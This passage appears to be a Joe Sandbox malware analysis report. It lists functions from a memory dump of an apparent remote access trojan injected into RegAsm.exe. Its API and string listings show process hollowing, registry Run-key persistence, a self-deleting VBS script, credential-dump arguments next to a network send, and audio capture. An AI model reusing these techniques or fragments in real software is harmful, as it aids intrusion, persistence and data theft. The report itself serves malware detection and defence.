API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
String ID: DISPLAY
API String ID: 479521175-865373369
Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A

Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
GetProcAddress.KERNEL32(00000000), ref: 00418139
GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
GetProcAddress.KERNEL32(00000000), ref: 0041814D
GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
GetProcAddress.KERNEL32(00000000), ref: 00418161
GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
GetProcAddress.KERNEL32(00000000), ref: 00418175
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
GetThreadContext.KERNEL32(?,00000000), ref: 00418245
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
TerminateProcess.KERNEL32(?,00000000), ref: 00418301
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
SetThreadContext.KERNEL32(?,00000000), ref: 00418428
ResumeThread.KERNEL32(?), ref: 00418435
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
GetCurrentProcess.KERNEL32(?), ref: 00418457
TerminateProcess.KERNEL32(?,00000000), ref: 00418472
GetLastError.KERNEL32 ref: 0041847A

Strings

ZwMapViewOfSection, xrefs: 0041813B
ZwUnmapViewOfSection, xrefs: 0041814F
ZwCreateSection, xrefs: 0041811C
ZwClose, xrefs: 00418163
ntdll, xrefs: 00418121, 00418140, 00418154, 00418168

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
API String ID: 4188446516-3035715614
Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
ExitProcess.KERNEL32 ref: 0040D7D0

Strings

fso.DeleteFile ", xrefs: 0040D63A
0qF, xrefs: 0040D78C, 0040D797
open, xrefs: 0040D7BE
wend, xrefs: 0040D689
""", 0, xrefs: 0040D6E7
0qF, xrefs: 0040D737, 0040D778, 0040D661, 0040D68E
"), xrefs: 0040D5D5
dMG, xrefs: 0040D45B
Temp, xrefs: 0040D580
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D5AA
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D471
On Error Resume Next, xrefs: 0040D5B9
8SG, xrefs: 0040D4CF
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D701
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D4C2
while fso.FileExists(", xrefs: 0040D5EC
\update.vbs, xrefs: 0040D57B
exepath, xrefs: 0040D4F7
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D773
fso.DeleteFolder ", xrefs: 0040D6AB

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-332907002
Opcode ID: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
Opcode Fuzzy Hash: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E

Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7

Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
ExitProcess.KERNEL32 ref: 0040D419

Strings

fso.DeleteFile ", xrefs: 0040D315
open, xrefs: 0040D40C
pth_unenc, xrefs: 0040D09C
wend, xrefs: 0040D364
hpF, xrefs: 0040D38F
"), xrefs: 0040D2B1
8SG, xrefs: 0040D15E
.vbs, xrefs: 0040D201
Temp, xrefs: 0040D246
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040D285
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040D0E7
On Error Resume Next, xrefs: 0040D294
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040D138
while fso.FileExists(", xrefs: 0040D2C8
exepath, xrefs: 0040D181
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040D3C1
dMG, xrefs: 0040D0D1
fso.DeleteFolder ", xrefs: 0040D38A

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
API String ID: 3797177996-2557013105
Opcode ID: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
Opcode Fuzzy Hash: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E

Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
ExitProcess.KERNEL32(00000000), ref: 004124A0
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
CloseHandle.KERNEL32(00000000), ref: 0041253B
GetCurrentProcessId.KERNEL32 ref: 00412541
PathFileExistsW.SHLWAPI(?), ref: 00412572
GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
lstrcatW.KERNEL32 ref: 00412601

Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
Sleep.KERNEL32(000001F4), ref: 00412682
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
CloseHandle.KERNEL32(00000000), ref: 004126A9
GetCurrentProcessId.KERNEL32 ref: 004126AF

Strings

open, xrefs: 0041263B
8SG, xrefs: 004124A6
.exe, xrefs: 004125F5
WDH, xrefs: 00412548, 004126B6
exepath, xrefs: 004124CC
temp_, xrefs: 004125E3

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
String ID: .exe$8SG$WDH$exepath$open$temp_
API String ID: 2649220323-436679193
Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D

Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
SetEvent.KERNEL32 ref: 0041B219
WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
CloseHandle.KERNEL32 ref: 0041B23A
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266

Strings

play audio, xrefs: 0041B14B
pause audio, xrefs: 0041B1CA
" type , xrefs: 0041B0D5
open ", xrefs: 0041B0D0
alias audio, xrefs: 0041B0B8
resume audio, xrefs: 0041B1E2
stop audio, xrefs: 0041B257
close audio, xrefs: 0041B261
NG, xrefs: 0041B109, 0041B08B
status audio mode, xrefs: 0041B1F7
stopped, xrefs: 0041B202

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
API String ID: 738084811-2094122233
Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E

Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7

Strings

data, xrefs: 00401BB1
RIFF, xrefs: 00401AFD
fmt , xrefs: 00401B2D
WAVE, xrefs: 00401B1D

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3

Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
GetProcAddress.KERNEL32(00000000), ref: 0040728D
GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
GetProcAddress.KERNEL32(00000000), ref: 004072A5
GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
GetProcAddress.KERNEL32(00000000), ref: 004072B9
GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
GetProcAddress.KERNEL32(00000000), ref: 004072CD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
GetProcAddress.KERNEL32(00000000), ref: 004072E1
GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
GetProcAddress.KERNEL32(00000000), ref: 004072F5

Strings

RtlAcquirePebLock, xrefs: 004072C4
NtFreeVirtualMemory, xrefs: 004072B0
LdrEnumerateLoadedModules, xrefs: 004072EC
NtAllocateVirtualMemory, xrefs: 0040729C
ntdll.dll, xrefs: 00407278, 00407283, 004072A1, 004072B5, 004072C9, 004072DD, 004072F1
RtlReleasePebLock, xrefs: 004072D8
RtlInitUnicodeString, xrefs: 0040727E
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00407271

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
API String ID: 1646373207-255920310
Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D

Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0040CE07
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
CopyFileW.KERNEL32 ref: 0040CED0
_wcslen.LIBCMT ref: 0040CEE6
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
CopyFileW.KERNEL32 ref: 0040CF84
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
_wcslen.LIBCMT ref: 0040CFC6
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
CloseHandle.KERNEL32 ref: 0040D02D
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
ExitProcess.KERNEL32 ref: 0040D062

Strings

open, xrefs: 0040D044
6, xrefs: 0040CEDA
del, xrefs: 0040CFF5
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040CE91, 0040CE96, 0040CEC9, 0040CF7E, 0040CF83, 0040CF8A, 0040CFEB

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
API String ID: 1579085052-2309681474
Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E

Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0041C036
_memcmp.LIBVCRUNTIME ref: 0041C04E
lstrlenW.KERNEL32(?), ref: 0041C067
FindFirstVolumeW.KERNEL32 ref: 0041C0A2
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
lstrcmpW.KERNEL32(?,?), ref: 0041C114
FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
_wcslen.LIBCMT ref: 0041C13B
FindVolumeClose.KERNEL32 ref: 0041C15B
GetLastError.KERNEL32 ref: 0041C173
GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
lstrcatW.KERNEL32 ref: 0041C1B9
lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
GetLastError.KERNEL32 ref: 0041C1D0

Strings

?, xrefs: 0041C0CD

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
String ID: ?
API String ID: 3941738427-1684325040
Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA

Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587

Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
Sleep.KERNEL32(00000064), ref: 00412E94

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

0TG, xrefs: 0041314C
0TG, xrefs: 00413026
NG, xrefs: 00412F6C
/stext ", xrefs: 00412BAA, 00412C4C, 00412CEE
NG, xrefs: 004130C1

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: /stext "$0TG$0TG$NG$NG
API String ID: 1223786279-2576077980
Opcode ID: de99695a2377092233645f0904676b2253a7a5c985bfcff82bcc484c3e6878f2
Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
Opcode Fuzzy Hash: de99695a2377092233645f0904676b2253a7a5c985bfcff82bcc484c3e6878f2
Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

Function 0044F42D Relevance: 24.4, APIs: 16, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F4BF
_free.LIBCMT ref: 0044F4E5
_free.LIBCMT ref: 0044F50E
_free.LIBCMT ref: 0044F546
_free.LIBCMT ref: 0044F577
_free.LIBCMT ref: 0044F5B8
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044F639
_free.LIBCMT ref: 0044F652
_free.LIBCMT ref: 0044F6FB
_free.LIBCMT ref: 0044F721
_free.LIBCMT ref: 0044F74A
_free.LIBCMT ref: 0044F77F
_free.LIBCMT ref: 0044F7B0
_free.LIBCMT ref: 0044F7F1
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F876
_free.LIBCMT ref: 0044F88F

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable
String ID:
API String ID: 1464849758-0
Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799

Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
RegCloseKey.ADVAPI32(?), ref: 0041C9BF

Strings

InstallLocation, xrefs: 0041C77C
UninstallString, xrefs: 0041C7A4
InstallDate, xrefs: 0041C790
DisplayVersion, xrefs: 0041C768
DisplayName, xrefs: 0041C73C
Publisher, xrefs: 0041C751
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A

Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

